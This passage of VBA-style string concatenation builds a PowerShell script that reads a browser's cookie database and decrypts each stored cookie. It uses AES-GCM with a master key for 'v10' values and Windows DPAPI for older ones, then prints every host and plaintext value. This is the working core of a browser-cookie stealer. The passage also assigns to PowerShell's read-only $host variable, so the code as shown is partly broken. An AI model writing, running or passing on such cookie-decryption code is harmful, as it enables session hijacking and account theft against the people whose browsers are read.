"$cookiesList = @()" & _
"$reader = $cmd.ExecuteReader()" & _
"while ($reader.Read()) {" & _
"    $host = $reader['host_key']" & _
"    $encrypted = $reader.GetValue(6)   # ordinal 6 for encrypted_value" & _
"    if ($encrypted -is [byte[]]) {" & _
"        $cookieValue = $null" & _
"        # Check if modern AES-GCM format" & _
"        $prefix = [System.Text.Encoding]::ASCII.GetString($encrypted, 0, 3)" & _
"        if ($prefix -eq 'v10') {" & _
"            $nonce = $encrypted[3..14]" & _
"            $ciphertext = $encrypted[15..($encrypted.Length-1)]" & _
"            $aes = [System.Security.Cryptography.AesGcm]::new($masterKey)" & _
"            $plaintext = New-Object byte[] ($ciphertext.Length - 16)" & _
"            $tag = $ciphertext[($ciphertext.Length-16)..($ciphertext.Length-1)]" & _
"            $ciphertextOnly = $ciphertext[0..($ciphertext.Length-17)]" & _
"            $aes.Decrypt($nonce, $ciphertextOnly, $tag, $plaintext)" & _
"            $cookieValue = [System.Text.Encoding]::UTF8.GetString($plaintext)" & _
"        } else {" & _
"            $cookieValue = [System.Text.Encoding]::UTF8.GetString(" & _
"                [System.Security.Cryptography.ProtectedData]::Unprotect(" & _
"                    $encrypted, $null, [System.Security.Cryptography.DataProtectionScope]::CurrentUser" & _
"                )" & _
"            )" & _
"        }" & _
"        # Add cookie to list" & _
"        $cookiesList += [PSCustomObject]@{Host=$host; Value=$cookieValue}" & _
"    }" & _
"}" & _
"$reader.Close()" & _
"# Optional: print the list" & _
"$cookiesList | ForEach-Object { Write-Host 'Host: ' + $_.Host + ' : Value: ' + $_.Value }"
